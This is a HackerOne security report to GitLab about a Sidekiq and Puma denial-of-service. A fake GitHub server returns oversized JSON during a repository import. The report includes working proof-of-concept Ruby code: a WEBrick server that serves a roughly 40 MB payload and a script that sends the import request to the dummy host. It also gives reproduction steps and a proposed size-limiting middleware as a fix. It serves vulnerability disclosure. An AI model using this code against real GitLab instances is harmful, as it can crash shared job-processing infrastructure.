Sidekiq DoS and Puma DoS by importing a repo from a GitHub dummy server using POST /api/v4/import/github
HackerOne report #2499070 by a92847865
on 2024-05-10, assigned to @greg:
Report | Attachments | How To Reproduce
Report
Summary
While studying an old but interesting bug (#371098 (closed)), I observed that Sawyer creates a large number of objects during response processing. Because response data is never validated, a server can answer a call from Octokit with arbitrarily large and complex data, and Octokit (via Sawyer) will happily deserialize it. An attacker can therefore craft a medium-sized payload (around 40 MB) and serve it to Octokit to crash a high-memory Sidekiq instance (memory limit: 12 GB).
Since a job is created for every issue, pull request, comment, and several other objects, an attacker can place multiple such payloads in a single repository to maximize the damage. In theory, one import request can take down a whole fleet of Sidekiq instances.
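For illustration only, here is a crude sketch of the kind of dummy server the attached zip file implements: a web server that answers every GitHub API call with a large, repetitive JSON body. The payload shape, size, and port are assumptions; the real server is in the attachment.
```ruby
# Hypothetical sketch of the dummy "GitHub" server (the real one is in the
# attached zip). It answers every request with a repetitive ~40 MB JSON body
# that Octokit/Sawyer on the importing side expands into a huge object graph.
require 'webrick'
require 'json'

# One issue-like object repeated thousands of times; sizes are illustrative.
big_item = { 'title' => 'x' * 1_024, 'body' => 'y' * 4_096, 'labels' => [] }
payload  = JSON.generate(Array.new(8_000) { big_item }) # roughly 40 MB

server = WEBrick::HTTPServer.new(Port: 8000)
server.mount_proc '/' do |_req, res|
  res['Content-Type'] = 'application/json'
  res.body = payload
end
trap('INT') { server.shutdown }
server.start
```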
Steps to reproduce
- Install a self-managed GitLab instance, enable GitHub import, and obtain a personal access token (PAT)
- Run a dummy server using the attached attack zip file
- Modify curl_import.sh (inside the zip file) with your PAT, the dummy server's address, and the GitLab instance's address
- Send the request to your GitLab instance (a hedged sketch of an equivalent request follows this list)
- Observe Sidekiq's excessive memory usage with htop
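For reference, the request sent by curl_import.sh should be roughly equivalent to the following Ruby sketch of the POST /api/v4/import/github call. The parameter names follow the documented GitHub import API; the github_hostname field (pointing the import at the dummy server), the placeholder hosts, and the tokens are assumptions, and the exact fields used by the attached script may differ.
```ruby
# Hypothetical equivalent of curl_import.sh: trigger a GitHub import via the
# GitLab API. Hosts and tokens are placeholders; github_hostname is assumed to
# be how the import is pointed at the dummy server.
require 'net/http'
require 'uri'
require 'json'

uri = URI('http://gitlab.example.com/api/v4/import/github')
req = Net::HTTP::Post.new(uri)
req['PRIVATE-TOKEN'] = '<gitlab-pat>'   # GitLab personal access token
req['Content-Type']  = 'application/json'
req.body = JSON.generate(
  personal_access_token: '<github-pat>',            # token the dummy server accepts
  repo_id: 1,                                       # repository id served by the dummy server
  target_namespace: 'some-group',
  new_name: 'imported-project',
  github_hostname: 'http://dummy.example.com:8000'  # assumed field for the dummy server address
)

res = Net::HTTP.start(uri.hostname, uri.port) { |http| http.request(req) }
puts "#{res.code} #{res.body}"
```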
Impact
A single repository import request can take down a whole fleet of Sidekiq instances by poisoning the job queue. To recover, every bad job has to be popped from the queue, which can disrupt other services.
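As an illustration of that recovery effort, dropping the poisoned jobs might look like the following sketch using the Sidekiq API from a GitLab Rails console; the queue name and the worker-class filter are assumptions about a typical deployment.
```ruby
# Illustrative clean-up sketch (not part of the report): delete the poisoned
# GitHub-import jobs. Queue name and class prefix are assumptions.
require 'sidekiq/api'

queue = Sidekiq::Queue.new('github_importer')
queue.each do |job|
  job.delete if job.klass.to_s.start_with?('Gitlab::GithubImport')
end
```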
What is the current bug behavior?
Octokit does not validate response data before deserializing it.
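To illustrate why this is expensive (my own sketch, not code from GitLab or the attachment): Sawyer wraps every nested hash of the parsed response in its own Sawyer::Resource, so a 40 MB JSON body becomes a much larger Ruby object graph.
```ruby
# Assumed illustration of Sawyer's behaviour: every nested hash becomes a
# Sawyer::Resource object, multiplying the memory cost of a large response.
require 'sawyer'
require 'json'

agent = Sawyer::Agent.new('http://example.test')
data  = JSON.parse('{"items":[{"a":{"b":{"c":1}}}]}', symbolize_names: true)

resource = Sawyer::Resource.new(agent, data)
puts resource.items.first.a.b.c # => 1; each level is a separate Resource object
```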
What is the expected correct behavior?
Add an Octokit middleware that checks the size of response data before it is deserialized (a minimal sketch follows).
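A minimal sketch of such a middleware, assuming a Faraday-based check on the response body size; the 10 MB limit, the class name, and the error handling are illustrative, not GitLab's actual fix.
```ruby
# Sketch of an Octokit/Faraday middleware that rejects oversized responses
# before Sawyer deserializes them. Limit and error class are assumptions.
require 'faraday'
require 'octokit'

class ResponseSizeLimit < Faraday::Middleware
  MAX_BYTES = 10 * 1024 * 1024 # assumed limit

  def call(env)
    @app.call(env).on_complete do |response_env|
      if response_env[:body].to_s.bytesize > MAX_BYTES
        raise Faraday::Error, "GitHub API response larger than #{MAX_BYTES} bytes"
      end
    end
  end
end

# Register the middleware in the stack Octokit hands to Faraday.
Octokit.middleware = Faraday::RackBuilder.new do |builder|
  builder.use ResponseSizeLimit
  builder.use Octokit::Response::RaiseError
  builder.adapter Faraday.default_adapter
end
```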
Relevant logs and/or screenshots
My VM (16 GB of memory) crashed, and the Sidekiq thread occupied over 14 GB of memory.
{F3259308}
Output of checks
Results of GitLab environment info
```
System information
System:          Ubuntu 20.04
Proxy:           no
Current User:    git
Using RVM:       no
Ruby Version:    3.1.4p223
Gem Version:     3.5.7
Bundler Version: 2.5.8
Rake Version:    13.0.6
Redis Version:   7.0.15
Sidekiq Version: 7.1.6
Go Version:      unknown

GitLab information
Version:         16.11.2-ee
Revision:        d210b947
Directory:       /opt/gitlab/embedded/service/gitlab-rails
DB Adapter:      PostgreSQL
DB Version:      14.11
URL:             http://34.125.73.177
HTTP Clone URL:  http://34.125.73.177/some-group/some-project.git
SSH Clone URL:   git@34.125.73.177:some-group/some-project.git
Elasticsearch:   no
Geo:             no
Using LDAP:      no
Using Omniauth:  yes
Omniauth Providers:

GitLab Shell
Version:             14.35.0
Repository storages:
- default:           unix:/var/opt/gitlab/gitaly/gitaly.socket
GitLab Shell path:   /opt/gitlab/embedded/service/gitlab-shell

Gitaly
- default Address:     unix:/var/opt/gitlab/gitaly/gitaly.socket
- default Version:     16.11.2
- default Git Version: 2.43.2
```
Impact
One malicious import request can potentially take down a whole fleet of Sidekiq instances by poisoning the job queue.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section: